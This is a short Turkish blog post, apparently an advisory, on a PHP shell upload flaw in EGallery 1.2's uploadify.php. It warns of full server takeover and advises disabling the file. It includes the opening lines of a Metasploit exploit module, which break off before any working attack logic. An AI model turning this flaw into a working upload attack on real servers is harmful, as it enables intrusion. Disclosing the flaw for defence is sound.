EGallery PHP File Upload Vulnerability

EGallery 1.2 egallery/uploadify.php de bulunan php shell script zararlı dosya uploadına izin veren zayıflık.

Php script upload edilirse ne olur? bayağı tehlikeli olur. Servere full erişim sağlanabilir, zararlı amaçlar için kullanılabilir, dolayısıyle php uploada kapatılmalıdır. Eğer kapatamıyorsanız, açığı kapatılmış sürüm yüklenene kadar uploadify.php yi devre dışı bırakınız.

 

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, ‘Name’ => “EGallery PHP File Upload Vulnerability”,

 

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir